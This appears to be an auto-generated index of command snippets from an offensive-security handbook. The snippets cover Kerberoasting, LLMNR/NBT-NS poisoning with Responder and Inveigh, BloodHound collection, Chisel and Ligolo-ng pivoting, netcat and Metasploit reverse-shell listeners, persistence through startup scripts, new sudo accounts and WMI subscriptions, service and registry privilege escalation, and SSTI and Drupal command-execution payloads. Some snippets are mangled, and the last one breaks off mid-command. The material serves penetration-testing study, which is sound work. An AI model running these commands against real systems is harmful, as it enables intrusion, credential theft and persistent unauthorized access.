### Install Impacket Source: https://github.com/hack-fast/hackfast/blob/main/docs/Offensive-Security/Active-Directory/Initial-Attack-Vectors/Kerberoasting/From-Linux.md Installs the Impacket library using pip. This command requires root privileges and ensures the tools are available system-wide. ```bash sudo python3 -m pip install . ``` -------------------------------- ### Manage systemd Service Lifecycle Source: https://github.com/hack-fast/hackfast/blob/main/docs/Offensive-Security/Linux-Environment/Establishing-Persistence/Startup-Scripts.md This section covers the systemd commands necessary to manage a newly created service, including reloading the daemon to recognize the service, enabling it to start on boot, and starting it manually. ```bash systemctl daemon-reload ``` ```bash systemctl enable your_service_name.service ``` ```bash systemctl start your_service_name.service ``` ```bash systemctl status your_service_name.service ``` ```bash journalctl -u your_service_name.service ``` -------------------------------- ### Navigate to Impacket Directory Source: https://github.com/hack-fast/hackfast/blob/main/docs/Offensive-Security/Active-Directory/Initial-Attack-Vectors/Kerberoasting/From-Linux.md Changes the current working directory to the cloned Impacket repository. This is necessary to run installation and usage commands. ```bash cd impacket ``` -------------------------------- ### Start Chisel Server Source: https://github.com/hack-fast/hackfast/blob/main/docs/Offensive-Security/Linux-Environment/Pivoting-Tunneling-and-Port-Forwarding/Pivoting/Chisel.md This command executes the Chisel server with specific configurations. It makes the binary executable, starts the server in verbose mode, listens on port 1234, and enables SOCKS5 proxying. ```bash chmod +x chisel && ./chisel server -v -p 1234 --socks5 ``` -------------------------------- ### Install Python MkDocs and Run Local Server Source: https://github.com/hack-fast/hackfast/blob/main/README.md Commands to install Python, create a virtual environment, activate it, install mkdocs-material, clone the Hackfast repository, and run the local development server. ```bash # Install Python MkDocs requires Python 3.7 or higher python3 --version # Create a virtual environment (recommended) python3 -m venv .venv # Activate the virtual environment # On Linux/macOS: source .venv/bin/activate # On Windows: .venv\Scripts\activate # Install dependencies pip install mkdocs-material # Clone the repository git clone https://github.com/hack-fast/Hackfast.git # Navigate into the Hackfast project directory cd Hackfast # Run the local development server mkdocs serve ``` -------------------------------- ### Install and Run Responder Source: https://github.com/hack-fast/hackfast/blob/main/docs/Offensive-Security/Active-Directory/Initial-Attack-Vectors/NBT-NS-Poisoning/From-Linux.md Steps to install Responder using apt and run it to listen for network requests. Replace 'ens224' with your actual network interface name. ```bash sudo apt update ``` ```bash sudo apt install responder ``` ```bash sudo responder -I ens224 ``` -------------------------------- ### Run Ligolo-ng Proxy Source: https://github.com/hack-fast/hackfast/blob/main/docs/Offensive-Security/Linux-Environment/Pivoting-Tunneling-and-Port-Forwarding/Pivoting/Ligolo-ng.md Starts the Ligolo-ng proxy on the attacker machine. The '-selfcert' or '-autocert' flags are used for certificate handling during the proxy setup. ```bash ./proxy -selfcert ``` ```bash ./proxy -autocert ``` -------------------------------- ### BloodHound Data Collection and Management Source: https://github.com/hack-fast/hackfast/blob/main/docs/Offensive-Security/Active-Directory/Initial-Scanning-&-Enumeration/Credentialed-Enumeration/From-Linux.md Commands for executing BloodHound Python data collector, starting Neo4j service, and launching the BloodHound GUI. Also includes an example for data extraction from JSON. ```bash sudo bloodhound-python -u '[USERNAME]' -p '[PASSWORD]' -ns [IP-ADDRESS] -d [DOMAIN] -c all ``` ```bash sudo neo4j start ``` ```bash bloodhound ``` ```bash /opt/Windows/BloodHound_Python/bloodhound.py -d hutch.offsec -u fmcsorley -p CrabSharkJellyfish192 -c all -ns 192.168.219.122 ``` ```bash cat 202020020_user.json | jq '.data[].Properties.name' | cut -d '"' -f 2 > useremail.txt ``` ```bash cat useremail.txt | cut -d '@' -f 1 > users.list ``` -------------------------------- ### Masscan Workflow Examples Source: https://github.com/hack-fast/hackfast/blob/main/docs/Offensive-Security/Network/tools/masscan.md Provides practical examples of combining Masscan options for common reconnaissance tasks, such as fast subnet scanning, targeted scans with exclusions, and full port scans. ```bash # Fast recon of top 100 ports on a /16 subnet masscan 192.168.0.0/16 --top-ports 100 --rate 5000 -oJ scan.json # Targeted scan of known ports with exclusions masscan -p22,80,443 -iL targets.txt --exclude 192.168.1.1 --rate 1000 -oX results.xml # Full port scan on one host for deeper analysis masscan 10.0.0.5 -p0-65535 --rate 2000 -oJ fullscan.json ``` -------------------------------- ### Install Impacket Package Source: https://github.com/hack-fast/hackfast/blob/main/docs/Offensive-Security/Active-Directory/Initial-Attack-Vectors/ASREPRoasting/From-Linux.md Installs the Impacket library using apt-get. This is a prerequisite for using Impacket tools like GetNPUsers.py. ```bash sudo apt-get update sudo apt-get install python3-impacket ``` -------------------------------- ### GoDork Installation and Usage Source: https://github.com/hack-fast/hackfast/blob/main/docs/Offensive-Security/Web-Application/Web-Enumeration/Google-Dorks.md Steps to install and utilize GoDork, a versatile tool for scanning multiple search engines. It includes cloning, building, and examples of performing dork scans with different parameters. ```bash sudo git clone https://github.com/dwisiswant0/go-dork.git cd go-dork sudo go build sudo cp go-dork /usr/local/bin/ go-dork -q "inurl:'testTarget'" go-dork -e google -q ".php?id=" cat dorks.txt | go-dork -p 5 ``` -------------------------------- ### Masscan Target Selection Examples Source: https://github.com/hack-fast/hackfast/blob/main/docs/Offensive-Security/Network/tools/masscan.md Demonstrates various ways to specify targets for Masscan, including single IPs, IP ranges, domain names, CIDR notation, and loading targets from a file. ```bash masscan 192.168.1.10 masscan 192.168.1.10 192.168.1.20 masscan 192.168.1.10-192.168.1.100 masscan example.com masscan 10.0.0.0/8 masscan -iL targets.txt masscan --exclude 192.168.1.1 masscan --excludefile exclude.txt ``` -------------------------------- ### View Services and Drivers Source: https://github.com/hack-fast/hackfast/blob/main/docs/Offensive-Security/Windows-Environment/Privilege-Escalation/System-Enumeration.md List running processes, active services, and installed drivers using command-line and PowerShell. Includes methods to get service status and detailed service information. ```cmd tasklist /v /fi "username eq system" ``` ```cmd sc query ``` ```cmd driverquery ``` ```powershell Get-Service ``` ```powershell Get-WmiObject -Class Win32_Service ``` -------------------------------- ### Build Ligolo-ng Agent and Proxy Source: https://github.com/hack-fast/hackfast/blob/main/docs/Offensive-Security/Linux-Environment/Pivoting-Tunneling-and-Port-Forwarding/Pivoting/Ligolo-ng.md Compiles the Ligolo-ng agent and proxy binaries from the source code. Requires Go to be installed on the system. ```bash cd ligolo-ng && go build -o agent cmd/agent/main.go && go build -o proxy cmd/proxy/main.go ``` -------------------------------- ### Get Service Configuration using sc qc Source: https://github.com/hack-fast/hackfast/blob/main/docs/Offensive-Security/Windows-Environment/Privilege-Escalation/Service-Exploits/Insecure-Service-Permissions/Service-Enumeration.md Uses the sc qc command to retrieve the configuration details of a specific service, including its start mode and binary path. ```batch sc qc daclsvc ``` -------------------------------- ### List Installed Programs Source: https://github.com/hack-fast/hackfast/blob/main/docs/Offensive-Security/Windows-Environment/Privilege-Escalation/System-Enumeration.md Enumerate installed programs and applications using file system enumeration, WMI queries, registry lookups, and the Get-Package cmdlet. Includes checking for installed AV products. ```powershell Get-ChildItem 'C:\Program Files', 'C:\Program Files (x86)' | ft Parent,Name,LastWriteTime ``` ```cmd WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName ``` ```powershell Get-WmiObject -Class Win32_Product | Select-Object -Property Name,Version ``` ```powershell Get-ItemProperty -Path "HKLM:\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\*" | Select-Object DisplayName, DisplayVersion, Publisher, InstallDate ``` ```powershell Get-Package ``` -------------------------------- ### Start and Check LXD Instance Status Source: https://github.com/hack-fast/hackfast/blob/main/docs/Offensive-Security/Linux-Environment/Privilege-Escalation/Service-Based/LXD.md Starts the LXD container named 'test' and then displays its current running state and information. ```bash lxc start test lxc info test ``` -------------------------------- ### Clone Impacket Repository Source: https://github.com/hack-fast/hackfast/blob/main/docs/Offensive-Security/Active-Directory/Initial-Attack-Vectors/Kerberoasting/From-Linux.md Clones the Impacket repository from GitHub to your local machine. This is the first step to setting up the Impacket tools for use. ```bash git clone https://github.com/SecureAuthCorp/impacket.git ``` -------------------------------- ### Start Ruby HTTP Server Source: https://github.com/hack-fast/hackfast/blob/main/docs/Offensive-Security/Windows-Environment/File-Transfer/Download-Operations.md Starts a simple HTTP server using Ruby's httpd module. This command serves files from the current directory on the specified port. It's a lightweight solution for file sharing. ```ruby ruby -run -e httpd . -p 8000 ``` -------------------------------- ### Start Apache HTTP Server Source: https://github.com/hack-fast/hackfast/blob/main/docs/Offensive-Security/Windows-Environment/File-Transfer/Download-Operations.md Starts the Apache web server, typically used for serving web content. Files placed in the Apache web directory (e.g., /var/www/html) can be accessed via HTTP. This requires the Apache service to be running. ```bash sudo systemctl start apache2 ``` -------------------------------- ### Test WinRM Login and Execute Command with crackmapexec Source: https://github.com/hack-fast/hackfast/blob/main/docs/Offensive-Security/Network/ports/5985.md Tests WinRM connectivity with provided credentials and executes a specified command. Useful for verifying access and understanding user context on the remote machine. It specifically uses the 'whoami' command in this example. ```bash crackmapexec winrm [TARGET-IP] -u [USERNAME] -p [PASSWORD] -x "whoami" ``` -------------------------------- ### Start Service and Netcat Listener Source: https://github.com/hack-fast/hackfast/blob/main/docs/Offensive-Security/Windows-Environment/Privilege-Escalation/Service-Exploits/Insecure-Service-Permissions/Service-Exploitation.md This snippet shows how to start a configured Windows service and simultaneously set up a Netcat listener on the attacker machine. The listener waits for incoming connections on the specified port. ```bash sc start daclsvc ``` ```bash sudo rlwrap -cAr nc -lvnp 1338 ``` -------------------------------- ### GooFuzz Installation and Usage Source: https://github.com/hack-fast/hackfast/blob/main/docs/Offensive-Security/Web-Application/Web-Enumeration/Google-Dorks.md Instructions for installing and using GooFuzz, a Go-based tool for efficient Google Dorking. It covers cloning the repository, building the binary, and running searches with various options. ```bash sudo git clone https://github.com/m3n0sd0n4ld/GooFuzz cd GooFuzz sudo cp GooFuzz /usr/local/bin/ GooFuzz -h GooFuzz -t target.com -e pdf,doc,bak ``` -------------------------------- ### Host LinPEAS Script with Python Source: https://github.com/hack-fast/hackfast/blob/main/docs/Offensive-Security/Linux-Environment/Pivoting-Tunneling-and-Port-Forwarding/Port-Forwarding/Enumeration.md Starts a simple HTTP server using Python 3 on port 8000. This allows the LinPEAS script to be hosted locally for transfer to a target machine. ```python python3 -m http.server 8000 ``` -------------------------------- ### Masscan Output Format Examples Source: https://github.com/hack-fast/hackfast/blob/main/docs/Offensive-Security/Network/tools/masscan.md Demonstrates how to save Masscan scan results in different formats, including JSON, XML, and a simple list format, suitable for automation and analysis. ```bash masscan -p80 1.2.3.4 -oJ output.json masscan -p80 1.2.3.4 -oX output.xml masscan --output-format list ``` -------------------------------- ### Upload Files via WebDAV Source: https://github.com/hack-fast/hackfast/blob/main/docs/Offensive-Security/Windows-Environment/File-Transfer/Upload-Operations.md Details uploading files using the Web Distributed Authoring and Versioning (WebDAV) protocol. This includes installing a WebDAV server, starting it, and copying files. ```bash sudo pip3 install wsgidav cheroot ``` ```bash sudo wsgidav --host=0.0.0.0 --port=8081 --root=/tmp --auth=anonymous ``` ```bash dir \[IP-ADDRESS]\DavWWWRoot ``` ```bash copy C:\Temp\file.zip \[IP-ADDRESS]\DavWWWRoot\ ``` -------------------------------- ### Start Python 2 HTTP Server Source: https://github.com/hack-fast/hackfast/blob/main/docs/Offensive-Security/Windows-Environment/File-Transfer/Download-Operations.md Starts a simple HTTP server using Python 2 on a specified port. This allows for easy file sharing and downloading from the directory where the server is initiated. It's a quick way to serve files locally. ```bash python -m SimpleHTTPServer 8000 ``` -------------------------------- ### Install Impacket Source: https://github.com/hack-fast/hackfast/blob/main/docs/Offensive-Security/Active-Directory/Initial-Attack-Vectors/DCSync/From-Linux.md Installs Impacket, a Python library for working with network protocols, which is necessary for extracting password hashes. ```bash sudo apt-get update sudo apt-get install python3-pip pip3 install impacket ``` -------------------------------- ### Start PHP HTTP Server Source: https://github.com/hack-fast/hackfast/blob/main/docs/Offensive-Security/Windows-Environment/File-Transfer/Download-Operations.md Starts an HTTP server using PHP's built-in web server functionality. This is useful for serving web content or files from a directory. It binds to all network interfaces on the specified port. ```bash php -S 0.0.0.0:8000 ``` -------------------------------- ### Start Service Source: https://github.com/hack-fast/hackfast/blob/main/docs/Offensive-Security/Windows-Environment/Privilege-Escalation/Service-Exploits/Weak-Registry-Permissions/Registry-Exploitation.md Starts a Windows service by its name. If the ImagePath has been compromised, this command will execute the malicious binary. ```bash net start regsvc ``` -------------------------------- ### Start Apache Server and Download File Source: https://github.com/hack-fast/hackfast/blob/main/docs/Offensive-Security/Linux-Environment/File-Transfer/Download-Operations.md Covers copying a file to the Apache web directory, starting the Apache server, and downloading the file using wget or curl. ```bash cp nc.exe /var/www/html ``` ```bash sudo systemctl start apache2 ``` ```bash wget http://[IP-ADRESS]:8000/file.txt ``` ```bash curl –O https://[IP-ADRESS]:8000/file.txt ``` -------------------------------- ### Get Exim Binary Help Information Source: https://github.com/hack-fast/hackfast/blob/main/docs/Offensive-Security/Linux-Environment/Privilege-Escalation/SUID-SGID-Executables/Exploiting-Vulnerable-SUID-Binaries.md Retrieves the help information for the Exim binary to understand its functionalities and confirm it's not a custom binary. This step is crucial for initial reconnaissance. ```bash /usr/sbin/exim-4.84-3 --help ``` -------------------------------- ### Host PowerShell Script with Python (Python Command) Source: https://github.com/hack-fast/hackfast/blob/main/docs/Offensive-Security/Windows-Environment/Privilege-Escalation/Token-Impersonation/SeBackupPrivilege-SeRestorePrivilege.md This command starts a simple HTTP server using Python in the current directory. This is used to host the downloaded PowerShell script so it can be transferred to a target machine. It requires Python to be installed and accessible. The server listens on port 80. ```python python -m http.server 80 ``` -------------------------------- ### Telnet POP3 Interaction Example Source: https://github.com/hack-fast/hackfast/blob/main/docs/Offensive-Security/Network/ports/110.md This example demonstrates a manual interaction with a POP3 server using Telnet. It shows a client connecting, authenticating with USER and PASS commands, listing emails with LIST, retrieving a message with RETR, and the server's responses. ```text hackfast@kali:~$ telnet [IP-ADRESS] 110 +OK alpha POP3 service (JAMES POP3 Server 2.3.2) active USER mrrobot +OK PASS secretpassword +OK Welcome mrrobot list +OK 2 1807 1 786 2 1021 retr 1 +OK Retrieving message From: mrrobot@hackfa.st Hello Mr. Robot, Below is your remote desktop login info. Please remember it! username: mrrobot password: S3cur3P@ssw0rd ``` -------------------------------- ### Build Chisel Binary Source: https://github.com/hack-fast/hackfast/blob/main/docs/Offensive-Security/Linux-Environment/Pivoting-Tunneling-and-Port-Forwarding/Pivoting/Chisel.md This command navigates into the Chisel directory and compiles the source code into an executable binary. This is necessary if you do not use a pre-built version. ```bash cd chisel && go build ``` -------------------------------- ### Find Apache Default Installation Pages Source: https://github.com/hack-fast/hackfast/blob/main/docs/Offensive-Security/Web-Application/Web-Enumeration/Google-Dorks.md This Google Dork searches for the default installation page of Apache on Ubuntu servers. It helps identify unsecured servers that require immediate configuration to prevent potential security risks. ```Google Dorks intitle:"Apache2 Ubuntu Default Page: It works" ``` -------------------------------- ### Install ptunnel-ng and Dependencies Source: https://github.com/hack-fast/hackfast/blob/main/docs/Offensive-Security/Linux-Environment/Pivoting-Tunneling-and-Port-Forwarding/Pivoting/ICMP-Tunneling-with-ptunnel-ng.md Navigates into the cloned ptunnel-ng directory, installs necessary build dependencies (build-essential, autoconf, automake), and runs the autogen.sh script to prepare for compilation. ```bash cd ptunnel-ng && sudo apt install build-essential autoconf automake && sudo ./autogen.sh ``` -------------------------------- ### Host Binary with Python HTTP Server Source: https://github.com/hack-fast/hackfast/blob/main/docs/Offensive-Security/Windows-Environment/Privilege-Escalation/Service-Exploits/Weak-Registry-Permissions/Registry-Exploitation.md Starts a simple Python HTTP server to host the generated executable file. This allows the binary to be downloaded from a remote machine. ```python python -m SimpleHTTPServer 8001 ``` -------------------------------- ### Create and Configure Shell Script for Startup Source: https://github.com/hack-fast/hackfast/blob/main/docs/Offensive-Security/Linux-Environment/Establishing-Persistence/Startup-Scripts.md This section details the process of creating a shell script, making it executable, and configuring it to run automatically at system startup using traditional Linux runlevels. ```bash nano /path/to/your_script.sh ``` ```bash chmod 755 /path/to/your_script.sh ``` ```bash update-rc.d /path/to/your_script.sh defaults ``` ```bash ls -l /path/to/your_script.sh ``` ```bash ls -l /etc/rc*.d/*your_script.sh ``` -------------------------------- ### Test New User Account Source: https://github.com/hack-fast/hackfast/blob/main/docs/Offensive-Security/Linux-Environment/Establishing-Persistence/Add-Account.md Switches to the newly created user account using 'su -' to test its functionality. The 'whoami' command is then used to confirm the successful user switch. ```bash su - hackfast ``` ```bash whoami ``` -------------------------------- ### Start HTTP Server and Download File with Ruby Source: https://github.com/hack-fast/hackfast/blob/main/docs/Offensive-Security/Linux-Environment/File-Transfer/Download-Operations.md Provides commands to start a Ruby HTTP server and download a file using Ruby's Net::HTTP module. ```bash ruby -run -e httpd . -p 8000 ``` ```ruby ruby -e 'require "net/http"; File.write("file.txt", Net::HTTP.get(URI.parse("http://[IP-ADDRESS]:8000")))' ``` -------------------------------- ### Create a systemd Service for Script Execution Source: https://github.com/hack-fast/hackfast/blob/main/docs/Offensive-Security/Linux-Environment/Establishing-Persistence/Startup-Scripts.md This snippet provides the content for a systemd service file, defining how a script should be managed by systemd, including its description, dependencies, execution commands, and restart behavior. ```systemd [Unit] Description=Your Script Service After=network.target [Service] ExecStart=/path/to/your_script.sh ExecReload=/bin/kill -HUP $MAINPID ExecStop=/bin/kill -SIGINT $MAINPID Restart=on-failure User=root [Install] WantedBy=multi-user.target ``` -------------------------------- ### Start Netcat Listener Source: https://github.com/hack-fast/hackfast/blob/main/docs/Offensive-Security/Windows-Environment/Privilege-Escalation/Service-Exploits/Insecure-Permissions-Executable/Service-Exploitation.md Starts a simple netcat listener on the specified port. Useful as an alternative to Metasploit's handler for basic shell interactions. ```bash sudo rlwrap -cAr nc -lvnp 1338 ``` -------------------------------- ### Unattend.xml AutoLogon Example Source: https://github.com/hack-fast/hackfast/blob/main/docs/Offensive-Security/Windows-Environment/Privilege-Escalation/Credential-Hunting.md This XML snippet illustrates the AutoLogon configuration within an Unattend.xml file. It shows how to specify the username, password (in plain text in this example), and enable automatic logon. ```xml HackFast_p@ss true</PlainText> </Password> <Enabled>true</Enabled> <LogonCount>2</LogonCount> <Username>Administrator</Username> </AutoLogon> ``` -------------------------------- ### Inspect Inveigh Cmdlet Parameters (PowerShell) Source: https://github.com/hack-fast/hackfast/blob/main/docs/Offensive-Security/Active-Directory/Initial-Attack-Vectors/NBT-NS-Poisoning/From-Windows.md This code retrieves and displays the available parameters for the `Invoke-Inveigh` cmdlet, allowing users to understand the configuration options. ```powershell (Get-Command Invoke-Inveigh).Parameters ``` -------------------------------- ### Start HTTP Server and Download File with Python 3 Source: https://github.com/hack-fast/hackfast/blob/main/docs/Offensive-Security/Linux-Environment/File-Transfer/Download-Operations.md Illustrates starting an HTTP server in Python 3 and downloading a file using Python's urllib.request module. ```bash python3 -m http.server 8000 ``` ```python python3 -c 'import urllib.request;urllib.request.urlretrieve("http://[IP-ADRESS:8000]/file.txt", "file.txt")' ``` -------------------------------- ### Create New User with adduser Command Source: https://github.com/hack-fast/hackfast/blob/main/docs/Offensive-Security/Linux-Environment/Establishing-Persistence/Add-Account.md A recommended method for creating a new user. The 'adduser' command simplifies the process by prompting for necessary information such as password and user details. It handles file creation and permission setup automatically. ```bash sudo adduser hackfast ``` -------------------------------- ### Clone Ligolo-ng Repository Source: https://github.com/hack-fast/hackfast/blob/main/docs/Offensive-Security/Linux-Environment/Pivoting-Tunneling-and-Port-Forwarding/Pivoting/Ligolo-ng.md Clones the Ligolo-ng repository from GitHub. This is the first step to obtain the source code for building the agent and proxy. ```bash git clone https://github.com/nicocha30/ligolo-ng.git ``` -------------------------------- ### Start HTTP Server and Download File with Python 2 Source: https://github.com/hack-fast/hackfast/blob/main/docs/Offensive-Security/Linux-Environment/File-Transfer/Download-Operations.md Demonstrates how to initiate a simple HTTP server in Python 2 and download a file from it using Python's urllib module. ```bash python -m SimpleHTTPServer 8000 ``` ```python python2 -c 'import urllib;urllib.urlretrieve ("http://[IP-ADRESS]:8000/file.txt", "file.txt")' ``` -------------------------------- ### Thymeleaf (Java) SSTI Payloads Source: https://github.com/hack-fast/hackfast/blob/main/docs/Offensive-Security/Web-Application/Web-Exploit/Injections/Server-Side-Injections/Checklist/SSTI.md SSTI testing payloads for Thymeleaf, a Java template engine. These examples focus on expression evaluation and attempting to execute system commands. ```Java ${7*7} ``` ```Java th:text="${T(java.lang.Runtime).getRuntime().exec('ls')}" ``` -------------------------------- ### Run InveighZero (C# Version) Source: https://github.com/hack-fast/hackfast/blob/main/docs/Offensive-Security/Active-Directory/Initial-Attack-Vectors/NBT-NS-Poisoning/From-Windows.md This snippet shows how to execute the InveighZero executable. It also mentions entering interactive mode and specific commands for retrieving captured NTLMv2 hashes and username information. ```bash .\Inveigh.exe ``` ```bash GET NTLMV2UNIQUE ``` ```bash GET NTLMV2USERNAMES ``` -------------------------------- ### Velocity (Java) SSTI Payloads Source: https://github.com/hack-fast/hackfast/blob/main/docs/Offensive-Security/Web-Application/Web-Exploit/Injections/Server-Side-Injections/Checklist/SSTI.md Examples of SSTI payloads for Apache Velocity, a Java template engine. These payloads test variable assignment and attempt to execute system commands. ```Java #set($x = 7 * 7) ``` ```Java $class.inspect("java.lang.Runtime").newInstance().exec("ls") ``` -------------------------------- ### Check Installed Applications (Registry/PowerShell) Source: https://github.com/hack-fast/hackfast/blob/main/docs/Offensive-Security/Windows-Environment/Privilege-Escalation/System-Enumeration.md Methods to query for installed applications on a Windows system. The registry method uses the 'reg query' command, while the PowerShell method uses 'Get-ItemProperty' targeting the Uninstall registry path. ```cmd reg query HKLM\Software\Microsoft\Windows\CurrentVersion\Uninstall ``` ```powershell Get-ItemProperty -Path "HKLM:\Software\Microsoft\Windows\CurrentVersion\Uninstall\*" ``` -------------------------------- ### CrackMapExec Local Account Connection Source: https://github.com/hack-fast/hackfast/blob/main/docs/Offensive-Security/Active-Directory/Initial-Scanning-&-Enumeration/Tools/Linux/CrackMapExec.md Demonstrates connecting to target systems using a local account with CrackMapExec. Includes options for specifying username, password, and using a null session. ```bash crackmapexec smb [IP-ADDRESS] -u '[USERNAME]' -p '[PASSWORD]' --local-auth ``` ```bash crackmapexec smb [IP-ADDRESS] -u "" -p "" ``` -------------------------------- ### Connect Chisel Client Source: https://github.com/hack-fast/hackfast/blob/main/docs/Offensive-Security/Linux-Environment/Pivoting-Tunneling-and-Port-Forwarding/Pivoting/Chisel.md This command initiates the Chisel client on the attack host, connecting to the Chisel server at the specified IP address and port. It then sets up a SOCKS proxy. ```bash ./chisel client -v 10.129.236.111:1234 socks ``` -------------------------------- ### Twig (PHP) SSTI Payloads Source: https://github.com/hack-fast/hackfast/blob/main/docs/Offensive-Security/Web-Application/Web-Exploit/Injections/Server-Side-Injections/Checklist/SSTI.md Payloads tailored for identifying and exploiting SSTI in Twig, a popular templating engine for PHP. These examples test basic functionality and access to environment variables. ```PHP {{7*7}} ``` ```PHP {{_self.env.globals}} ``` -------------------------------- ### Verify and Grant Sudo Privileges Source: https://github.com/hack-fast/hackfast/blob/main/docs/Offensive-Security/Linux-Environment/Establishing-Persistence/Add-Account.md Verifies the new user entry in the /etc/passwd file using 'cat' and 'grep'. It then grants the new user sudo privileges by adding them to the 'sudo' group using 'usermod'. ```bash cat /etc/passwd | grep 'hackfast' ``` ```bash sudo usermod -aG sudo hackfast ``` -------------------------------- ### Change Existing Scheduled Task Properties (schtasks) Source: https://github.com/hack-fast/hackfast/blob/main/docs/Offensive-Security/Windows-Environment/Establishing-Persistence/Scheduled-Tasks.md Modifies the properties of an existing scheduled task named 'MyStartupTask'. This example changes the trigger to daily and sets the start time to 09:00. Ensure the task name is accurate. ```batch schtasks /change /tn "MyStartupTask" /sc daily /st 09:00 ``` -------------------------------- ### Connect to RPC Server using rpcclient Source: https://github.com/hack-fast/hackfast/blob/main/docs/Offensive-Security/Network/ports/135.md Demonstrates how to establish a connection to an RPC server using rpcclient. It covers connecting with null authentication and with provided credentials. The tool simplifies remote procedure execution by abstracting network complexities. ```bash # Connect to RPC server using rpcclient on port 135/TCP with null (anonymous) authentication rpcclient -U "" -N [TARGET-IP] rpcclient -U "[USERNAME]" [TARGET-IP] # With creds ``` -------------------------------- ### FFUF Directory Discovery Source: https://github.com/hack-fast/hackfast/blob/main/docs/Offensive-Security/Web-Application/Web-Enumeration/Directory-Brute-Forcing.md FFUF (Fuzz Faster U Fool) is a web fuzzer written in Go. This example shows its basic usage for directory discovery with a common wordlist. ```bash ffuf -u [TARGET-URL]/FUZZ -w /usr/share/seclists/Discovery/Web-Content/raft-medium-directories.txt ``` -------------------------------- ### Copy Executable to User-Specific Startup Folder (Batch) Source: https://github.com/hack-fast/hackfast/blob/main/docs/Offensive-Security/Windows-Environment/Establishing-Persistence/Startup-Folder.md Copies a specified executable to the current user's Startup folder, ensuring it runs on login. This relies on the 'copy' command and requires the correct path to the executable and the user's Startup folder. ```batch copy path\to\your\executable.exe "C:\Users\[Username]\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\" ``` -------------------------------- ### Execute Commands via Drupal Filter Module (GET Request) Source: https://github.com/hack-fast/hackfast/blob/main/docs/Offensive-Security/Web-Application/Common-Applications/cms/Drupal.md After setting up the PHP code execution in a Drupal page, this example shows how to execute a command (e.g., 'id') by appending it as a query parameter to the page's URL. ```http http://[DRUPAL-DOMAIN]/node/1?cmd=id ``` -------------------------------- ### Get OS Information using PowerShell Source: https://github.com/hack-fast/hackfast/blob/main/docs/Offensive-Security/Windows-Environment/Privilege-Escalation/System-Enumeration.md Fetch operating system details using PowerShell cmdlets. This includes general OS information and more comprehensive system details. ```powershell Get-WmiObject -Class Win32_OperatingSystem ``` ```powershell Get-ComputerInfo ``` -------------------------------- ### Copy Executable to All Users Startup Folder (Batch) Source: https://github.com/hack-fast/hackfast/blob/main/docs/Offensive-Security/Windows-Environment/Establishing-Persistence/Startup-Folder.md Copies a specified executable to the Startup folder for all users, ensuring it runs on login for any user account. This uses the 'copy' command and requires the correct path to the executable and the global Startup folder. ```batch copy path\to\your\executable.exe "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\" ``` -------------------------------- ### Masscan Port Scanning Options Source: https://github.com/hack-fast/hackfast/blob/main/docs/Offensive-Security/Network/tools/masscan.md Shows how to specify ports for scanning, from individual ports to full port ranges, and how to enable banner grabbing for service information. ```bash masscan -p80,443 10.0.0.1 masscan -p0-65535 10.0.0.1 masscan --ports 21,22,23,80,443 masscan --banners ``` -------------------------------- ### Clone Chisel Repository Source: https://github.com/hack-fast/hackfast/blob/main/docs/Offensive-Security/Linux-Environment/Pivoting-Tunneling-and-Port-Forwarding/Pivoting/Chisel.md This command clones the official Chisel repository from GitHub. It is the first step to obtain the Chisel source code for building the network tool. ```bash git clone https://github.com/jpillora/chisel.git ``` -------------------------------- ### Load and Run Inveigh Module (PowerShell) Source: https://github.com/hack-fast/hackfast/blob/main/docs/Offensive-Security/Active-Directory/Initial-Attack-Vectors/NBT-NS-Poisoning/From-Windows.md This snippet demonstrates how to load the Inveigh PowerShell module and execute it with specific parameters to enable LLMNR, NBNS, console output, and file output. ```powershell Import-Module .\Inveigh.ps1 Invoke-Inveigh -LLMNR Y -NBNS Y -ConsoleOutput Y -FileOutput Y ``` -------------------------------- ### List Network Interfaces and IPs Source: https://github.com/hack-fast/hackfast/blob/main/docs/Offensive-Security/Linux-Environment/Privilege-Escalation/Strategy.md Displays network interface information, including IP addresses. Essential for understanding the network environment. ```bash ifconfig ``` ```bash ip a ``` -------------------------------- ### Restart Service using net command Source: https://github.com/hack-fast/hackfast/blob/main/docs/Offensive-Security/Windows-Environment/Privilege-Escalation/Service-Exploits/Insecure-Permissions-Executable/Service-Exploitation.md Starts a Windows service named 'filepermsvc' using the 'net start' command. This is an alternative to the 'sc start' command for initiating service execution. ```cmd net start filepermsvc ``` -------------------------------- ### Create WMI Event Filter (PowerShell) Source: https://github.com/hack-fast/hackfast/blob/main/docs/Offensive-Security/Windows-Environment/Establishing-Persistence/WMI-Event-Subscription.md Defines the conditions for triggering an event using WQL. This example filters for the creation of a 'notepad.exe' process within a 60-second window. ```powershell New-CimInstance -Namespace root\subscription -ClassName __EventFilter -Property @{ Name = 'MyEventFilter'; EventNamespace = 'root\cimv2'; QueryLanguage = 'WQL'; Query = "SELECT * FROM __InstanceCreationEvent WITHIN 60 WHERE TargetInstance ISA 'Win32_Process' AND TargetInstance.Name = 'notepad.exe'" } ``` -------------------------------- ### Set Up Netcat Listener Source: https://github.com/hack-fast/hackfast/blob/main/docs/Offensive-Security/Linux-Environment/Privilege-Escalation/Service-Based/Logrotate.md This command starts a Netcat listener on your attacking machine, waiting for an incoming connection on the specified port (e.g., 9001). ```bash nc -nlvp 9001 ``` -------------------------------- ### Set Up Netcat Listener Source: https://github.com/hack-fast/hackfast/blob/main/docs/Offensive-Security/Linux-Environment/Establishing-Persistence/Cron-Jobs.md This command starts a Netcat listener on a specified port, waiting to receive incoming reverse shell connections. ```shell nc -lvp 5556 ``` -------------------------------- ### Set up Metasploit Handler Source: https://github.com/hack-fast/hackfast/blob/main/docs/Offensive-Security/Windows-Environment/Privilege-Escalation/Token-Impersonation/SeDebugPrivilege.md Configures and starts a Metasploit multi-handler to listen for incoming Meterpreter connections. It sets the payload, local host, and local port to match the generated payload. ```bash msfconsole -x "use exploit/multi/handler; set payload windows/x64/meterpreter/reverse_tcp; set LHOST tun0; set LPORT 9001; run" ``` -------------------------------- ### Download and Host PowerShell Script with wget and Python Source: https://github.com/hack-fast/hackfast/blob/main/docs/Offensive-Security/Windows-Environment/Privilege-Escalation/Token-Impersonation/SeManageVolumePrivilege.md Downloads the 'EnableAllTokenPrivs.ps1' script using wget and then hosts it locally using Python's HTTP server. This is the first step in enabling elevated privileges. ```shell wget 